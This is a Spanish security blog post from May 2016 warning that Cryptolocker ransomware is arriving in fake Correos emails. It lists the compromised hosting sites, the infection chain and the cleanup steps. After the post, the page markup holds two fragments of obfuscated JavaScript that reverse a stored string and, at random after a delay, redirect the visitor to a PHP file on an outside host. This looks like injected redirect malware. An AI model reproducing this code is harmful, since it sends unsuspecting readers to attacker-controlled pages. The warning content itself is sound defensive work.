Cryptolockers de ultima generación
Se están recibiendo nuevas variantes del ransomware Cryptolocker, de los que llegan en falso mail de Correos, que vemos en la URL de los dos enlaces contenido en dicho mail, donde indica “Descargar información sobre su envío” y “Haga clic aquí para darse de baja.” son de un site de París:
ttp://coaf.es/…
site hospedado en:
País France
Ciudad Paris
Latitud 48.860000610352
Longitud 2.3499999046326
ISP OVH SAS
toloocker en mail de 13-5-2016″ width=”265″ height=”300″ />
y otro similar recibido ayer, donde dichos enlaces apuntan a esta otra URL:
http://mz-photo.pl/…
site hospedado en:
País Romania
Ciudad Constanta
Latitud 44.183300018311
Longitud 28.64999961853
ISP Institutul National de Cercetare-Dezvoltare in inf
tolocker en mail de Correos dia 12-5-2016″ width=”263″ height=”300″ />
Los ISP correspondientes son servidores que han sido hackeados y donde han insertado instrucciones para los fines maliciosos, sin que tengan que estar relacionados con los hackers en cuestión.
Sin cambios significativos, se recuerda que NO SE DEBE PULSAR ni en los enlaces de dichas imagenes, ni entrar los CAPTCHAS que ofrecen si se ha hecho, (22558) que descarga un ZIP que extrae o bien EXE o JS que es un paso intermedio para conseguir el EXE de marras.
SI se ha hecho todo lo que decimos que NO DEBE HACERSE, pasa a cifrar con un RSA2048, los ficheros de datos de las unidades compartidas con el ordenador que ha ejecutado el ransomware, que es el que el único que ha sido infectado y que debe limpiarse, pues en el registro queda una clave de lanzamiento del fichero EXE que se ha instalado en dicho ordenador, y que si no se elimina volvería a actuar en los siguientes reinicios.
Si no es conocido por los antivirus ni por el ELISTARA, ya que hay nuevas versiones cada día, como puede verse, conviene lanzar el SPROCES y tras pulsar SALIR, enviarnos el informe que genera para investigarlo y poder indicar el fichero en cuestión, al cual debe añadirse la extensión .VIR para que ya no pueda ser lanzado en siguiente reinicios, y enviarnoslo para controlar en siguiente versión del ELISTARA.
Una vez encontrado y aparcado el fichero en cuestión, puede procederse a restaurar la copia de seguridad para ¡seguir disponiendo de los datos de los ordenadores afectados, especialmemte del servidor del sistema.
Y una vez mas recordamos nuestras indicaciones al respecto de los ransomwares, que pueden verse en la Noticia de nuestro blog, que vamos actualizando (ver el final)
El Cryptolocker es el mas antiguo del los ransomwares, que codifican ficheros pidiendo rescate, pero dura y dura … !
saludos
ms, 13-5-2016
NOTA: Los interesados en información sobre contrato de soporte Asistencia Tecnica de SATINFO y/o licencia de uso/actualizaciones de sus utilidades, contacten con info@satinfo.es
__________
Este blog no se hace responsable de las opiniones y comentarios de los textos en los que se cita la Fuente, ofreciendo su contenido solo para facilitar el acceso a la información del mismo.
Puedes seguir cualquier respuesta a esta entrada mediante el canal RSS 2.0. Los comentarios y los pings están cerrados.
Siguenos
en facebook{if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}</script>toloocker-en-mail-de-13-5-2016.jpg”><img decoding=){kind=link}
{if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}</script>tolocker-en-mail-de-Correos-dia-12-5-2016.jpg”><img decoding=){kind=link}
Los comentarios están cerrados.